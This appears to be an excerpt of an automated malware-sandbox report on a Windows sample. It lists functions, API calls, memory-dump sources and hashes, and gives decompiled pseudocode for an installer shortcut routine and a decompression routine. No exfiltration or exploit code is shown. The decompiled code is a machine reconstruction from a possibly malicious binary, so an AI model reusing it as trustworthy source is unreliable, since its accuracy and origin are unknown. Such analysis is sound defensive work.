                                                                                                                                                    Function 6E6286A0, Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadResource.KERNEL32(00000000,6E628946,6E628946,?,6E628946,00000000), ref: 6E6286AE
                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 6E6286C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$LoadLock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1037334470-0
                                                                                                                                                    • Opcode ID: e28bf371204e9c71136bf8cd95fb0fd4f4030a35e2f23f5b4d1fa7ebe553fc61
                                                                                                                                                    • Instruction ID: 037ec82c5772396a9c77cf8d9ae0e2ebb8748c4ad924839ee7398af883b78bb1
                                                                                                                                                    • Opcode Fuzzy Hash: e28bf371204e9c71136bf8cd95fb0fd4f4030a35e2f23f5b4d1fa7ebe553fc61
                                                                                                                                                    • Instruction Fuzzy Hash: 7E210B74E00209EFCF44DFE9C98599EBBB1BF49340F2085A9E806A7254D7749A40DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E672571, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,6E672570,?,?,?,?), ref: 6E672593
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,6E672570,?,?,?,?), ref: 6E67259A
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 6E6725AC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                    • Opcode ID: 724eda151874b3e7fd6853629d9b7cbeadaeb6e0605ea5db179c75bc7efbf87c
                                                                                                                                                    • Instruction ID: f1db90c30c11c02445b1f70a598dad95582833c46ede483c53ab8d07415d0a1e
                                                                                                                                                    • Opcode Fuzzy Hash: 724eda151874b3e7fd6853629d9b7cbeadaeb6e0605ea5db179c75bc7efbf87c
                                                                                                                                                    • Instruction Fuzzy Hash: 11E0B671061508BFDF216BA5C929A4A3F79EB42345B408414F90696222EB35E981DBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004024FB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E004024FB() {
				signed int _t52;
				void* _t55;
				intOrPtr* _t59;
				intOrPtr _t60;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				signed int _t69;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t79;
				void* _t83;
				signed int _t94;
				intOrPtr* _t100;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				void* _t113;

				 *((intOrPtr*)(_t113 - 0xc)) = E0040145C(_t102, 0xfffffff0);
				_t107 = E0040145C(_t102, 0xffffffdf);
				 *((intOrPtr*)(_t113 - 8)) = E0040145C(_t102, 2);
				 *((intOrPtr*)(_t113 - 0x10)) = E0040145C(_t102, 0xffffffcd);
				 *((intOrPtr*)(_t113 - 0x44)) = E0040145C(_t102, 0x45);
				if(E00405D51(_t107) == 0) {
					E0040145C(__edx, 0x21);
				}
				_t52 =  *(_t113 - 0x1c);
				E004062CF(L"CreateShortCut: out: \"%s\", in: \"%s %s\", icon: %s,%d, sw=%d, hk=%d",  *((intOrPtr*)(_t113 - 0xc)));
				_t55 = _t113 + 8;
				__imp__CoCreateInstance(0x40ac30, _t83, 1, 0x40ac10, _t55, _t107,  *((intOrPtr*)(_t113 - 8)),  *((intOrPtr*)(_t113 - 0x10)), _t52 & 0x000000ff, _t52 >> 0x00000008 & 0x000000ff, _t52 >> 0x10);
				if(_t55 < _t83) {
					L13:
					_push(0x4100f0);
					 *((intOrPtr*)(_t113 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t59 =  *((intOrPtr*)(_t113 + 8));
					_t60 =  *((intOrPtr*)( *_t59))(_t59, 0x40ac20, _t113 - 0x14);
					 *((intOrPtr*)(_t113 - 0x34)) = _t60;
					if(_t60 >= _t83) {
						_t63 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)(_t113 - 0x34)) =  *((intOrPtr*)( *_t63 + 0x50))(_t63, _t107);
						_t65 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)( *_t65 + 0x24))(_t65, 0x4d70b0);
						_t94 =  *(_t113 - 0x1c);
						_t69 = _t94 >> 0x00000008 & 0x000000ff;
						if(_t69 != 0) {
							_t101 =  *((intOrPtr*)(_t113 + 8));
							 *((intOrPtr*)( *_t101 + 0x3c))(_t101, _t69);
							_t94 =  *(_t113 - 0x1c);
						}
						_t70 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)( *_t70 + 0x34))(_t70, _t94 >> 0x10);
						_t72 =  *((intOrPtr*)(_t113 - 0x10));
						if( *_t72 != _t83) {
							_t100 =  *((intOrPtr*)(_t113 + 8));
							 *((intOrPtr*)( *_t100 + 0x44))(_t100, _t72,  *(_t113 - 0x1c) & 0x000000ff);
						}
						_t73 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)( *_t73 + 0x2c))(_t73,  *((intOrPtr*)(_t113 - 8)));
						_t75 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)( *_t75 + 0x1c))(_t75,  *((intOrPtr*)(_t113 - 0x44)));
						if( *((intOrPtr*)(_t113 - 0x34)) >= _t83) {
							_t79 =  *((intOrPtr*)(_t113 - 0x14));
							 *((intOrPtr*)(_t113 - 0x34)) =  *((intOrPtr*)( *_t79 + 0x18))(_t79,  *((intOrPtr*)(_t113 - 0xc)), 1);
						}
						_t77 =  *((intOrPtr*)(_t113 - 0x14));
						 *((intOrPtr*)( *_t77 + 8))(_t77);
					}
					_t61 =  *((intOrPtr*)(_t113 + 8));
					 *((intOrPtr*)( *_t61 + 8))(_t61);
					if( *((intOrPtr*)(_t113 - 0x34)) >= _t83) {
						_push(0x4100f0);
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00404F9E();
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t113 - 4));
				return 0;
			}
























                                                                                                                                                    0x00402504
                                                                                                                                                    0x0040250e
                                                                                                                                                    0x00402517
                                                                                                                                                    0x00402521
                                                                                                                                                    0x0040252a
                                                                                                                                                    0x00402534
                                                                                                                                                    0x00402538
                                                                                                                                                    0x00402538
                                                                                                                                                    0x0040253d
                                                                                                                                                    0x00402565
                                                                                                                                                    0x0040256d
                                                                                                                                                    0x0040257e
                                                                                                                                                    0x00402586
                                                                                                                                                    0x00402646
                                                                                                                                                    0x00402646
                                                                                                                                                    0x0040264b
                                                                                                                                                    0x00402652
                                                                                                                                                    0x0040258c
                                                                                                                                                    0x0040258c
                                                                                                                                                    0x0040259b
                                                                                                                                                    0x0040259d
                                                                                                                                                    0x004025a2
                                                                                                                                                    0x004025a8
                                                                                                                                                    0x004025b2
                                                                                                                                                    0x004025b5
                                                                                                                                                    0x004025c0
                                                                                                                                                    0x004025c3
                                                                                                                                                    0x004025cb
                                                                                                                                                    0x004025cd
                                                                                                                                                    0x004025cf
                                                                                                                                                    0x004025d6
                                                                                                                                                    0x004025d9
                                                                                                                                                    0x004025d9
                                                                                                                                                    0x004025dc
                                                                                                                                                    0x004025e6
                                                                                                                                                    0x004025e9
                                                                                                                                                    0x004025ef
                                                                                                                                                    0x004025f4
                                                                                                                                                    0x004025fe
                                                                                                                                                    0x004025fe
                                                                                                                                                    0x00402601
                                                                                                                                                    0x0040260a
                                                                                                                                                    0x0040260d
                                                                                                                                                    0x00402616
                                                                                                                                                    0x0040261c
                                                                                                                                                    0x0040261e
                                                                                                                                                    0x0040262c
                                                                                                                                                    0x0040262c
                                                                                                                                                    0x0040262f
                                                                                                                                                    0x00402635
                                                                                                                                                    0x00402635
                                                                                                                                                    0x00402638
                                                                                                                                                    0x0040263e
                                                                                                                                                    0x00402644
                                                                                                                                                    0x00402659
                                                                                                                                                    0x0040265e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402644
                                                                                                                                                    0x00401689
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                    Strings
                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                                    • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                    • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                    • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                    • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E66CE40, Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a76e9b8a3e74350a93271d66a07f85b25744016eaf651595cb6aff5bd8129689
                                                                                                                                                    • Instruction ID: 7a0c53f81dea4e62381ecaf92c353d30c65076da7ea306c9ef9591c46e3f80cc
                                                                                                                                                    • Opcode Fuzzy Hash: a76e9b8a3e74350a93271d66a07f85b25744016eaf651595cb6aff5bd8129689
                                                                                                                                                    • Instruction Fuzzy Hash: 4CF17D71E102199FDF14CFA8C89069EFBB5FF89314F25826AD919AB344D730AA01CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E657714, Relevance: 3.4, APIs: 2, Instructions: 395COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6E65771E
                                                                                                                                                    • RedrawWindow.USER32(00000000,00000000,00000000,00000105,00000000,00000000,00000000), ref: 6E65790A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3RedrawWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 474685049-0
                                                                                                                                                    • Opcode ID: df0856115cfdaa93d953a056194d0050831bfea7544a19a878e25678217e360f
                                                                                                                                                    • Instruction ID: 189e42049464df60f8b84032911a025efd955db7033bddb04374359f1613f369
                                                                                                                                                    • Opcode Fuzzy Hash: df0856115cfdaa93d953a056194d0050831bfea7544a19a878e25678217e360f
                                                                                                                                                    • Instruction Fuzzy Hash: 10E18E70B00216DFDF04DFA5C854BAE7BBAAF46314F108469E815AB3D0DB34AD61CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E67FC01, Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E67FBFC,?,?,00000008,?,?,6E67F894,00000000), ref: 6E67FE2E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                    • Opcode ID: 154add78b20d5a66f4c398cab345a33411730568d1cd0645179add2569b1fd70
                                                                                                                                                    • Instruction ID: 8ac704a2bf25206bc9fdd053275a2bff346cb72663d4934d583cba262739c49b
                                                                                                                                                    • Opcode Fuzzy Hash: 154add78b20d5a66f4c398cab345a33411730568d1cd0645179add2569b1fd70
                                                                                                                                                    • Instruction Fuzzy Hash: 10B14B31610609DFDB65CF68C496F957BE0FF46364F258658E8A9CF2A2C335E982CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6677A0, Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                    • Opcode ID: 32f00af1db8748d413c6d3fa4f4898d27e24dcc2980e01cc7c5345527efef1ff
                                                                                                                                                    • Instruction ID: 519e397da51c58f5faa4d4bd055d41de78466392ea2f0131f4a53b5bcd00ea42
                                                                                                                                                    • Opcode Fuzzy Hash: 32f00af1db8748d413c6d3fa4f4898d27e24dcc2980e01cc7c5345527efef1ff
                                                                                                                                                    • Instruction Fuzzy Hash: FE6167706702066BDB548AF988A07FEB7E9AB83714F000A3ED492DB2D4D765BD41C387
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E66756E, Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                    • Opcode ID: a6c98b051bcc60003578bb64c468caee76f53c6464358168b65597930a51df46
                                                                                                                                                    • Instruction ID: bd65b8681c375902fc01bb2305847b211ccdcbb91cf609d6ba8e133b08567da1
                                                                                                                                                    • Opcode Fuzzy Hash: a6c98b051bcc60003578bb64c468caee76f53c6464358168b65597930a51df46
                                                                                                                                                    • Instruction Fuzzy Hash: 34518B7027464A5BDB9489FD89F0BEE7BAE9B0330CF00085ED481DB2C2DB51F94586A7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E66733C, Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                    • Opcode ID: 653a8addd0be8cad07bcc2a3365b3db07f103c981d5176ab075db065b8bc2b3b
                                                                                                                                                    • Instruction ID: 85d2a1d2c1e09d228f11c2d36ac01a01284fe297715e0677194245a0ca57e1a9
                                                                                                                                                    • Opcode Fuzzy Hash: 653a8addd0be8cad07bcc2a3365b3db07f103c981d5176ab075db065b8bc2b3b
                                                                                                                                                    • Instruction Fuzzy Hash: 6B519D3027474AABDB9489E984A57EE7B9D9B63308F10081ACC41E72F1DB21FA44C357
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E674FB1, Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                    • API String ID: 0-595813830
                                                                                                                                                    • Opcode ID: fd383c953274d3f59dd3f3c8dc6768be104938f5a87e6949a311502c328e1fa7
                                                                                                                                                    • Instruction ID: f4ee40663592930f1ac3c57536b8ef1df8cc33fc23b2c34bfb7304961144d480
                                                                                                                                                    • Opcode Fuzzy Hash: fd383c953274d3f59dd3f3c8dc6768be104938f5a87e6949a311502c328e1fa7
                                                                                                                                                    • Instruction Fuzzy Hash: 5FE0C23698062877CE603AD15C08F9B7B14C7436B2F400062FA185A30496A14C12C2F5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004079A2, Relevance: .3, Instructions: 347COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E004079A2(signed int* __ebx) {
				signed int _t492;
				signed int _t497;
				signed int _t508;
				void* _t509;
				signed int _t512;
				signed int _t513;
				signed int _t546;
				void* _t549;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				intOrPtr* _t555;
				unsigned int _t556;
				signed int _t564;
				signed int _t571;
				signed int _t576;
				signed char* _t579;
				signed int* _t583;
				signed int _t623;
				signed char _t631;
				signed int _t632;
				signed int _t641;
				signed int _t643;
				signed int _t647;
				signed int _t650;
				signed int _t655;
				signed int _t665;
				signed int _t667;
				signed int _t670;
				void* _t671;

				L0:
				while(1) {
					L0:
					_t583 = __ebx;
					_t647 =  *(_t671 - 0x38);
					L58:
					while(_t647 < 0xe) {
						_t655 = 0;
						if( *(_t671 - 0x30) == 0) {
							L198:
							_t583[0x147] =  *(_t671 - 0x3c);
							_t583[0x146] = _t647;
							 *(_t671 - 4) = _t655;
							( *(_t671 + 8))[1] = _t655;
							L199:
							 *( *(_t671 + 8)) =  *(_t671 - 0x34);
							_t583[0x26ea] =  *(_t671 - 0x2c);
							E0040731E( *(_t671 + 8));
							_t492 =  *(_t671 - 4);
							L196:
							return _t492;
						}
						L57:
						 *(_t671 - 0x30) =  *(_t671 - 0x30) - 1;
						 *(_t671 - 0x3c) =  *(_t671 - 0x3c) | ( *( *(_t671 - 0x34)) & 0x000000ff) << _t647;
						 *(_t671 - 0x34) =  &(( *(_t671 - 0x34))[1]);
						_t647 = _t647 + 8;
					}
					_t497 =  *(_t671 - 0x3c) & 0x00003fff;
					_t583[1] = _t497;
					if((_t497 & 0x0000001f) > 0x1d || (_t497 & 0x000003e0) > 0x3a0) {
						L200:
						_t583[0x147] =  *(_t671 - 0x3c);
						 *_t583 = 0x11;
						_t583[0x146] = _t647;
						( *(_t671 + 8))[1] =  *(_t671 - 0x30);
						goto L201;
					} else {
						L61:
						 *(_t671 - 0x3c) =  *(_t671 - 0x3c) >> 0xe;
						_t647 = _t647 - 0xe;
						_t583[2] = _t583[2] & 0x00000000;
						 *_t583 = 0xc;
						while(1) {
							L68:
							 *(_t671 - 0x38) = _t647;
							L69:
							while(_t583[2] >= (_t583[1] >> 0xa) + 4) {
								_t509 = 0x13;
								L72:
								while(_t583[2] < _t509) {
									_t124 = _t583[2] + 0x40ab04; // 0x121110
									 *(_t583 + 0xc +  *_t124 * 4) =  *(_t583 + 0xc +  *_t124 * 4) & 0x00000000;
									_t131 =  &(_t583[2]);
									 *_t131 = _t583[2] + 1;
								}
								_push(_t671 - 0xc);
								_push( &(_t583[0x148]));
								_push( &(_t583[0x144]));
								_push(0);
								_push(0);
								_push(_t509);
								_push(_t509);
								_push( &(_t583[3]));
								_t583[0x143] = 7;
								 *(_t671 - 0xc) = 0;
								_t512 = E0040737E( &(_t583[0x143]));
								if(_t512 != 0 || _t583[0x143] == _t512) {
									L76:
									 *_t583 = 0x11;
									goto L191;
								} else {
									L75:
									_t583[2] = _t583[2] & _t512;
									 *_t583 = 0xd;
									L98:
									while(_t583[2] < (_t583[1] >> 0x00000005 & 0x0000001f) + (_t583[1] & 0x0000001f) + 0x102) {
										_t546 = _t583[0x143];
										while(1) {
											L81:
											if(_t647 >= _t546) {
												break;
											}
											L79:
											_t655 = 0;
											if( *(_t671 - 0x30) == 0) {
												goto L198;
											}
											L80:
											 *(_t671 - 0x30) =  *(_t671 - 0x30) - 1;
											 *(_t671 - 0x3c) =  *(_t671 - 0x3c) | ( *( *(_t671 - 0x34)) & 0x000000ff) << _t647;
											 *(_t671 - 0x34) =  &(( *(_t671 - 0x34))[1]);
											_t647 = _t647 + 8;
										}
										L82:
										_t549 = _t583[0x144] + ( *(0x40c0a8 + _t546 * 2) & 0x0000ffff &  *(_t671 - 0x3c)) * 4;
										_t641 =  *(_t549 + 1) & 0x000000ff;
										_t550 =  *(_t549 + 2) & 0x0000ffff;
										 *(_t671 - 0xc) = _t550;
										if(_t550 >= 0x10) {
											L84:
											if(_t550 != 0x12) {
												_t551 = _t550 + 0xfffffff2;
												 *(_t671 - 4) = 3;
											} else {
												_t551 = 7;
												 *(_t671 - 4) = 0xb;
											}
											while(1) {
												L89:
												if(_t647 >= _t551 + _t641) {
													break;
												}
												L87:
												_t655 = 0;
												if( *(_t671 - 0x30) == 0) {
													goto L198;
												}
												L88:
												 *(_t671 - 0x30) =  *(_t671 - 0x30) - 1;
												 *(_t671 - 0x3c) =  *(_t671 - 0x3c) | ( *( *(_t671 - 0x34)) & 0x000000ff) << _t647;
												 *(_t671 - 0x34) =  &(( *(_t671 - 0x34))[1]);
												_t647 = _t647 + 8;
											}
											L90:
											 *(_t671 - 0x3c) =  *(_t671 - 0x3c) >> _t641;
											_t643 =  *(_t671 - 4) + ( *(0x40c0a8 + _t551 * 2) & 0x0000ffff &  *(_t671 - 0x3c));
											 *(_t671 - 0x3c) =  *(_t671 - 0x3c) >> _t551;
											_t623 = _t583[2];
											_t647 = _t647 - _t641 - _t551;
											_t552 = _t583[1];
											_t665 = _t552 >> 0x00000005 & 0x0000001f;
											_t193 = (_t552 & 0x0000001f) + 0x102; // 0x105
											if(_t643 + _t623 > _t665 + _t193) {
												goto L200;
											}
											L91:
											if( *(_t671 - 0xc) != 0x10) {
												L94:
												_t667 = 0;
												L95:
												_t555 = _t583 + 0xc + _t623 * 4;
												do {
													L96:
													 *_t555 = _t667;
													_t623 = _t623 + 1;
													_t555 = _t555 + 4;
													_t643 = _t643 - 1;
												} while (_t643 != 0);
												_t583[2] = _t623;
												continue;
											}
											L92:
											if(_t623 < 1) {
												goto L200;
											}
											L93:
											_t667 =  *((intOrPtr*)(_t583 + 8 + _t623 * 4));
											goto L95;
										}
										L83:
										 *(_t671 - 0x3c) =  *(_t671 - 0x3c) >> _t641;
										_t647 = _t647 - _t641;
										 *(_t583 + 0xc + _t583[2] * 4) = _t550;
										_t583[2] = _t583[2] + 1;
									}
									_t556 = _t583[1];
									_t583[0x144] = _t583[0x144] & 0x00000000;
									 *(_t671 - 8) =  *(_t671 - 8) & 0x00000000;
									_t670 = (_t556 & 0x0000001f) + 0x101;
									 *((intOrPtr*)(_t671 - 0x10)) = (_t556 >> 0x00000005 & 0x0000001f) + 1;
									_push(_t671 - 8);
									_push( &(_t583[0x148]));
